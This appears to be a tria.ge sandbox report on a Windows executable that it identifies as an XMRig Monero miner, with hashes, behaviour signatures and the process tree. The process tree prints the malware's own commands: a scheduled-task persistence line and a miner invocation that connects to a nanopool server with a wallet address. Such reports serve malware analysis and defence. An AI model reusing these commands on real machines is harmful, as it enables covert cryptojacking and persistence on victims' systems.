Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
93s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
05/11/2022, 22:48
Static task
static1
Behavioral task
behavioral1
Sample
b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6.exe
Resource
win7-20220812-en
General
-
Target
b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6.exe
-
Size
1.7MB
-
MD5
27b284fab61afb4e351edbcbd930aa3f
-
SHA1
06d1988f308245688c337c1e4751cf3c262a02ba
-
SHA256
b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6
-
SHA512
07f40ee220eaf4f27a58d6389496694de8aebbfe3f5b588988349a68b1192faca4cd7fd81eb9f17bf3836e786381f1865658b65bc06942dff495736d0b08f3b3
-
SSDEEP
49152:PvKK9gn45q8P+D48aQ5QhRPjkNtJeLHkJkQ:PWoetJeDE
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral2/memory/912-145-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/912-146-0x0000000140343234-mapping.dmp xmrig behavioral2/memory/912-147-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/912-148-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/912-150-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/912-152-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 2352 DBJYPFS.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation DBJYPFS.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2352 set thread context of 912 2352 DBJYPFS.exe 93 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1684 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4556 timeout.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2352 DBJYPFS.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 648 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1064 b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6.exe Token: SeDebugPrivilege 2352 DBJYPFS.exe Token: SeLockMemoryPrivilege 912 vbc.exe Token: SeLockMemoryPrivilege 912 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 912 vbc.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1064 wrote to memory of 2628 1064 b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6.exe 79 PID 1064 wrote to memory of 2628 1064 b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6.exe 79 PID 2628 wrote to memory of 4556 2628 cmd.exe 81 PID 2628 wrote to memory of 4556 2628 cmd.exe 81 PID 2628 wrote to memory of 2352 2628 cmd.exe 86 PID 2628 wrote to memory of 2352 2628 cmd.exe 86 PID 2352 wrote to memory of 1748 2352 DBJYPFS.exe 88 PID 2352 wrote to memory of 1748 2352 DBJYPFS.exe 88 PID 1748 wrote to memory of 1684 1748 cmd.exe 90 PID 1748 wrote to memory of 1684 1748 cmd.exe 90 PID 2352 wrote to memory of 912 2352 DBJYPFS.exe 93 PID 2352 wrote to memory of 912 2352 DBJYPFS.exe 93 PID 2352 wrote to memory of 912 2352 DBJYPFS.exe 93 PID 2352 wrote to memory of 912 2352 DBJYPFS.exe 93 PID 2352 wrote to memory of 912 2352 DBJYPFS.exe 93 PID 2352 wrote to memory of 912 2352 DBJYPFS.exe 93 PID 2352 wrote to memory of 912 2352 DBJYPFS.exe 93 PID 2352 wrote to memory of 912 2352 DBJYPFS.exe 93 PID 2352 wrote to memory of 912 2352 DBJYPFS.exe 93 PID 2352 wrote to memory of 912 2352 DBJYPFS.exe 93 PID 2352 wrote to memory of 912 2352 DBJYPFS.exe 93 PID 2352 wrote to memory of 912 2352 DBJYPFS.exe 93 PID 2352 wrote to memory of 912 2352 DBJYPFS.exe 93 PID 2352 wrote to memory of 912 2352 DBJYPFS.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6.exe"C:\Users\Admin\AppData\Local\Temp\b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF409.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:4556
-
-
C:\ProgramData\AppsWin\DBJYPFS.exe"C:\ProgramData\AppsWin\DBJYPFS.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DBJYPFS" /tr "C:\ProgramData\AppsWin\DBJYPFS.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DBJYPFS" /tr "C:\ProgramData\AppsWin\DBJYPFS.exe"5⤵
- Creates scheduled task(s)
PID:1684
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4AAvbZFu6CJe2k13FgFmnDWHasLSbsKpXNumeQrWnZU8gpV9dURkEmJYtTYSohPLrCYA8bBN5PJRWbo1qgLuzpyNApcPYRh --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:912
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD527b284fab61afb4e351edbcbd930aa3f
SHA106d1988f308245688c337c1e4751cf3c262a02ba
SHA256b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6
SHA51207f40ee220eaf4f27a58d6389496694de8aebbfe3f5b588988349a68b1192faca4cd7fd81eb9f17bf3836e786381f1865658b65bc06942dff495736d0b08f3b3
-
Filesize
1.7MB
MD527b284fab61afb4e351edbcbd930aa3f
SHA106d1988f308245688c337c1e4751cf3c262a02ba
SHA256b1c49fcfa6c8b0e513c7b3bc7e9994d801e307c376f3ca2bdb9f374a51ef19f6
SHA51207f40ee220eaf4f27a58d6389496694de8aebbfe3f5b588988349a68b1192faca4cd7fd81eb9f17bf3836e786381f1865658b65bc06942dff495736d0b08f3b3
-
Filesize
143B
MD5d530c0884f779a9145136f58007c06d7
SHA19b7d9b7c193107aeb688fb60b6f30ee0501a618b
SHA256a94e2825fda5aeee4c421ce5a0218ae038377050877d9766488aa1ebeca3d841
SHA512326dd947b24041b3aebc918926f4839de0cd30d01169a032c15ef826608bf9dfcfa7fd86f4f1e343c6f1ff29e735cb955701eae0efb32f18d37eeb6771c89eb4